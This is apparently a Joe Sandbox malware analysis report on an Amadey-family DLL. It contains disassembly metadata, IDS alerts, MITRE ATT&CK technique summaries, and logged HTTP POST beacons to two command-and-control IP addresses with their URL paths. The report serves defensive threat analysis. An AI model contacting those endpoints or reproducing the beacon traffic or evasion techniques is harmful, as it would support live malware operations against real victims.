SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E4EFB5E,00000001,?,?,?,6E4ED927,?,00000000,00000000,6E4FCB78,0000002C,6E4ED998), ref: 6E4EB36F

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7569476a2ca9f6af9349cf9b073b3d1f2eeea64c3e6e1d8928cedc49e67053ff
Instruction ID: f13be2a0f94b3c8578fb1e99a9a5869785044004fc272d115bfe2ee56336badc
Opcode Fuzzy Hash: 7569476a2ca9f6af9349cf9b073b3d1f2eeea64c3e6e1d8928cedc49e67053ff
Instruction Fuzzy Hash: F51127326047016FD67026F56CC5E6B216EABC2B7FB280D2BF224A3ACDDF618C014194

Function 6E4F0666 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001), ref: 6E4F067D
GetLastError.KERNEL32(?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001,?,00000001,?,6E4EFB7F,6E4ED927), ref: 6E4F0689

Part of subcall function 6E4F064F: CloseHandle.KERNEL32(FFFFFFFE,6E4F0699,?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001,?,00000001), ref: 6E4F065F

___initconout.LIBCMT ref: 6E4F0699

Part of subcall function 6E4F0611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E4F0640,6E4F00B7,00000001,?,6E4EF633,?,?,00000001,?), ref: 6E4F0624

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001,?), ref: 6E4F06AE

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 57bbd04981c7b4d3e8de3786125b3f5846ea38d03b3f16dd82d9ae52e5c6ba71
Instruction ID: 2f3cb43d0fedce2f5481e17592efb47ad0ec043d181fcc28614a3e0fe25c8bd4
Opcode Fuzzy Hash: 57bbd04981c7b4d3e8de3786125b3f5846ea38d03b3f16dd82d9ae52e5c6ba71
Instruction Fuzzy Hash: 5FF0F876510528FBCF626FF1EC04D8A3F66EBC9AA1B144451FA1A86120D632C830ABE1

Function 6E4EAC4F Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4EAC58

Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937

_free.LIBCMT ref: 6E4EAC6B
_free.LIBCMT ref: 6E4EAC7C
_free.LIBCMT ref: 6E4EAC8D

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d269e835c1d3350d2310734a5bb0488d24b857d290f331d26f14dab692f851a
Instruction ID: 79561dffd2f669c92bf75050a5046485b2c8d61a5e975ebbbd7b7845968b3d3d
Opcode Fuzzy Hash: 7d269e835c1d3350d2310734a5bb0488d24b857d290f331d26f14dab692f851a
Instruction Fuzzy Hash: A4E04F71812E259FCE613FB0B4008863B35AFC6E14325051BE40742E19C7310A72DFCE

Function 6E4EA367 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E4EA3AA, 6E4EA3B1, 6E4EA3E7

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 87b766455858efee915443517d75d9928726719b6e40b22a3ab5522f9aa105cf
Instruction ID: fc59ddaac333667a3a0226d240196b87765cfd0be9719247886e218bd4528903
Opcode Fuzzy Hash: 87b766455858efee915443517d75d9928726719b6e40b22a3ab5522f9aa105cf
Instruction Fuzzy Hash: 2B418C71E00715AFDB22DFFA9884D9EBBFCEF85701B10046BE41597A00E7B08A51DB91

Function 6E4E866A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E4E868F

Strings

MOC, xrefs: 6E4E86A1
RCC, xrefs: 6E4E86A9

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 99f21350c2c1473a08d9c881d713816b6c7fba90362b94180ef86e809992d3e7
Instruction ID: 89d8790904d1aae12cae17f418a900ac6b3d5f0582396805c1928d9d270cbcae
Opcode Fuzzy Hash: 99f21350c2c1473a08d9c881d713816b6c7fba90362b94180ef86e809992d3e7
Instruction Fuzzy Hash: EA418732900209AFCF05CFE4CD81EEEBBB5BF48305F19849AFA18A7651D3359950DB91

Source: http://185.81.68.147/7vhfjke3/index.php_	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpf	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/Fvu5jh4DbS/index.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpw	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpS	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpP	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php~	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Br	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php-	Avira URL Cloud: Label: phishing

Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.11:49716 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.11:49723 -> 185.81.68.148:80

Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI
Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI

Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.148
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report D72j5I83wU.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
D72j5I83wU.dll

Function 6E4E1EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409
networkfileCOMMON

Function 6E4E31B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477
COMMON

Function 6E4E1ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386
networkfileCOMMON

Function 6E4E6E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Function 6E4E6F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6E4EB423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Function 6E4E6D73 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6E4EEEAE Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Function 6E4EB8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE